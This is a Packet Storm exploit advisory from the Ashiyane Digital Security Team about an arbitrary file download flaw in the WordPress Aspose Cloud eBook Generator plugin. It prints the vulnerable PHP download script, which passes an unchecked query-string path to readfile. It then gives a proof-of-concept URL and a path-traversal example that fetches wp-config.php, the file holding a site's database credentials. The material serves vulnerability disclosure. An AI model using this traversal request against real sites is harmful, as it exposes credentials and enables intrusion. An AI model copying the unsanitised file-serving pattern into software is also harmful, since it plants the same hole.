WordPress Aspose Cloud eBook Generator File Download

2015-03-26T00:00:00
ID PACKETSTORM:131040
Type packetstorm
Reporter Ashiyane Digital Security Team
Modified 2015-03-26T00:00:00

Description

|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|
|-------------------------------------------------------------------------|
| [+] Exploit Title: WordPress Aspose-Cloud-eBook-Generator Plugin Arbitrary File Download Vulnerability |
| [+] Exploit Author: Ashiyane Digital Security Team |
| [+] Vendor Homepage: https://wordpress.org/plugins/aspose-cloud-ebook-generator/
| [+] Download Link: https://downloads.wordpress.org/plugin/aspose-cloud-ebook-generator.zip
| [+] Tested on: Windows, Linux |
| [+] Discovered By: ACC3SS
|-------------------------------------------------------------------------|
| [+] Exploit: |
| [+] Vulnerable file:
| http://localhost/wordpress/wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php |
| [+] Vulnerable Code:

<?php

// Attacker-controlled: the path comes straight from the query string with
// no authentication, no allow-list and no canonicalisation.
$file = $_GET['file'];

// Only the last path component is used for the download's file name ...
$file_arr = explode('/',$file);
$file_name = $file_arr[count($file_arr) - 1];

header ("Content-type: octet/stream");
header ("Content-disposition: attachment; filename=".$file_name.";");

// ... but the full, unsanitised path is what is opened and sent, so ../
// sequences or an absolute path return any file the web server user can read.
header("Content-Length: ".filesize($file));
readfile($file);

exit;

?>

| [+] PoC:
| http://localhost/wordpress/wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php?file=[File Address]
| [+] Example:
| http://localhost/wordpress/wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php?file=../../../wp-config.php
|-------------------------------------------------------------------------|
|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|